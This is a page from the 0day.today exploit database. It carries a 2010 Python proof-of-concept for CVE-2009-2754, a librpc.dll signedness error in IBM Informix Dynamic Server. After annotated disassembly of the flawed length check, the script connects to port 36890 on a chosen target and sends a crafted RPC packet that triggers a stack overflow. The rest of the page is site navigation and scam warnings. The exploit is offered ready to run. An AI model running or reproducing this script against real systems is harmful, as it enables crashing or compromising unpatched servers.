0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Multiple Vendor librpc.dll Signedness Error Remote Code Execution Vuln
=============================================================================== Multiple Vendor librpc.dll Signedness Error Remote Code Execution Vulnerability =============================================================================== # Exploit Title: ZDI-10-023: Multiple Vendor librpc.dll Signedness Error Remote Code Execution Vulnerability # Date: 2010-04-08 # Author: ZSploit.com # Software Link: N/A # Version: N/A # Tested on: IBM Informix Dynamic Server 10.0 # CVE : CVE-2009-2754 #! /usr/bin/env python ############################################################################### ## File : zs_ids_rpc.py ## Description: ## : ## Created_On : Mar 21 2010 ## ## (c) Copyright 2010, ZSploit.com. all rights reserved. ############################################################################### """ The issue in __lgto_svcauth_unix(): .text:1000B8E1 mov [ebp+0], eax .text:1000B8E4 mov eax, [ebx] .text:1000B8E6 push eax ; netlong .text:1000B8E7 add ebx, 4 .text:1000B8EA call esi ; ntohl ; Get length of hostname .text:1000B8EC cmp eax, 0FFh ; Signedness error, if we give 0xffffffff(-1) will pass this check .text:1000B8F1 jle short loc_1000B8FD .text:1000B8F3 mov esi, 1 .text:1000B8F8 jmp loc_1000B9D5 .text:1000B8FD ; --------------------------------------------------------------------------- .text:1000B8FD .text:1000B8FD loc_1000B8FD: ; CODE XREF: __lgto_svcauth_unix+71j .text:1000B8FD mov edi, [ebp+4] .text:1000B900 mov ecx, eax .text:1000B902 mov edx, ecx .text:1000B904 mov esi, ebx .text:1000B906 shr ecx, 2 .text:1000B909 rep movsd ; call memcpy here with user-supplied size cause a stack overflow .text:1000B90B mov ecx, edx .text:1000B90D add eax, 3 .text:1000B910 and ecx, 3 .text:1000B913 rep movsb """ import sys import socket if (len(sys.argv) != 2): print "Usage:\t%s [target]" % sys.argv[0] sys.exit(0) data = "\x80\x00\x00\x74\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02" \ "\x00\x01\x86\xb1\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01" \ "\x00\x00\x00\x4c\x00\x00\xd6\x45\xff\xff\xff\xff\x41\x41\x41\x41" \ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x0a\x42\x42\x42\x42\x42\x42\x42\x42" \ "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" \ "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" \ "\x00\x00\x00\x00\x00\x00\x00\x00" host = sys.argv[1] port = 36890 print "PoC for ZDI-10-023 by ZSploit.com" try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((host, port)) s.send(data) print "Sending payload .." except: print "Error in send" print "Done" except: print "Error in socket" The ZSploit Team http://zsploit.com # 0day.today [2024-10-05] #